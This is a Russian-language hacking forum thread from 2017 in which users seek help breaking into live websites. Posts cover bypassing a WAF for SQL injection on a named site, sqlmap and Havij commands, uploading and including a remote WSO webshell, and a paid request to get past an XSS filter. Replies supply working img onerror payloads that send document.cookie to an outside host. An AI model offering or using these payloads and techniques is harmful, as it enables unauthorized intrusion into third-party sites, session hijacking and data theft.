Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Скорее всего файл физически не льется на сервер, в списке он появляется, потому что скрипт загрузки и скрипт добавления в список не взаимодействуют друг с другом
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    скинь в пм , посмотрю
     
  3. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    ____://___.aratta-ukraine.com/text_ua.php?id=30559
    Стоит WAF.Реально ли обойти?
     
  4. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Error-Based SQL Injection .
    WAF фильтрует concat .
    *****.**/news.php?id=1 concat <---- пробовал так и выдаёт 403 . В общем блокает конкретно,как обойти или чем заменить ?

    ------
    Через Havij крутанул сайт . Поначалу в логах 404 выдавал,а потом через blind крутанул.
    Начал брутить таблицы из 731 вариантов ни один не подошёл.Пошёл в SQLMap он сразу 404 пишет.Я не знаю как попросить скулмап это заигнорить,ибо никакой ошибки то и нет . И я не ошибаюсь там реально скуля есть,ибо Havij всю инфу выдал кроме таблиц .
    Current-user,sql version и.т.д всё это есть .
     
    #1684 SaNDER, 26 Jan 2017
    Last edited: 26 Jan 2017
  5. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    делаю выборку юзера из таблицы, получаю:
    Code:
    [14:42:33] [WARNING] the SQL query provided does not return any output
    [14:42:33] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
    [14:42:33] [INFO] retrieved:
    [14:42:35] [WARNING] the SQL query provided does not return any output
    как быть?
    Code:
    ./sqlmap.py -u https://site.ru --data="vuln=dd" -p vuln --cookie "cookie" --dbs --random-agent --sql-shell --threads 10 --no-cast
     
    #1685 foozzione, 28 Jan 2017
    Last edited: 28 Jan 2017
  6. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    --level 5 --risk 3
     
  7. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Залить шелл в таких условиях?
    Code:
    $uploaddir = "img/news/";
    $temp=sha1(uniqid()).".jpg";
    $uploadfile = $uploaddir . $temp;
    move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);
     
  8. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Только в фантазиях :)
     
  9. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
  10. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    и еще один вопрос, есть lfi:
    Code:
    Warning: file_exists() expects parameter 1 to be a valid path, string given in /var/www/***/***/***.php on line 3170 Не найден файл: site_func/https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php
    судя из ошибка пыхи (а пыху знаю 6 лет), в file_exists нельзя пихать строку, требуется файл на сервере, как реализовать? Еще поправка, файлы онли .php подключает.

    UPD:
    Кстате любой файл исполняется, а не экранируется, конфиги не получить, cms знаю, пути знаю, как извлечь инфу нужную?

    Кто поможет раскрутить lfi (url не дам, только варианты пробовать буду), отбрагодарю финансово.

    В ЛС могу кинуть уязвимый код на пыхе
     
    #1690 foozzione, 29 Jan 2017
    Last edited: 29 Jan 2017
  11. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
  12. Elva

    Elva New Member

    Joined:
    1 Jan 2016
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    XSS.
    Задача обойти фильтр.
    Пропускает исключительно <img>
    10$ в BTC за результативную помощь в внедрении кода (ЛС).

    Сайт №1.

    Отправляю:
    Code:
    <img src="/" onerror="javascript:img = new Image(); img.src = "https://domen.com/1.gif?"+document.cookie;"></img>
    
    Получаю:
    Code:
    <img src="/" onerror="javascript:img = new Image(); img.src = " https:="" domen.com="" 1.gif?"="" document.cookie;"="">
    
    Сайт №2

    Отправляю:
    Code:
    <img onload="var s = document.createElement('script'); s.src='https://domen.com/1';  />
    
    Получаю
    Code:
    <img src="https://domen.com/1">
    
     
  13. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Синтаксис нарушен img.src = 'https://domen.com/1.gif?', возможно из-за этого парсер ломает структуру. javascript: там не нужен.

    Code:
    <img src=x onerror="var i = document.createElement('img');i.src = 'https://domen.com/1.gif?'+document.cookie;"></img>
    
    Во втором похоже на белый список атриббутов, фильтр вроде caja.
     
    #1693 crlf, 2 Feb 2017
    Last edited: 2 Feb 2017
  14. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
  15. cyrhaller

    cyrhaller New Member

    Joined:
    18 Mar 2016
    Messages:
    5
    Likes Received:
    2
    Reputations:
    6
    1:
    Code:
    <img src="/" onerror="new Image().src='http://domain/1.gif?'+document.cookie"></img>
    со вторым не факт, что получится, он вырезает лишние параметры из тега
     
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Я там не вижу уязвимости.
     
    winstrool and K800 like this.
  17. Mexel

    Mexel Member

    Joined:
    22 Nov 2016
    Messages:
    36
    Likes Received:
    39
    Reputations:
    3
    Нашел инклюдовскую уяз.,почитал о ней,попытался залить шелл,но не получается.
    Может кто-нибудь поможет?
    Code:
    Warning: include(mod/mtood"/index.php) [function.include]: failed to open stream: No such file or directory in /var/www/[site]/data/www/[site]/template/index.html on line 74
    
    Warning: include(mod/mtood"/index.php) [function.include]: failed to open stream: No such file or directory in /var/www/[site]/data/www/[site]/template/index.html on line 74
    
    Warning: include() [function.include]: Failed opening 'mod/mtood"/index.php' for inclusion (include_path='.:/opt/php5.3-mod/lib/php') in /var/www/[site]/data/www/[site]/template/index.html on line 74
    (Сайт могу скинуть в лс)

    И еще вопрос,можно ли шелл не держать у себя на сайте?Залить его к примеру на файлообменник...
     
  18. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    Ereee likes this.
  19. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Пробуй union-based, если не получится - Blind SQLi.
     
    foozzione and K800 like this.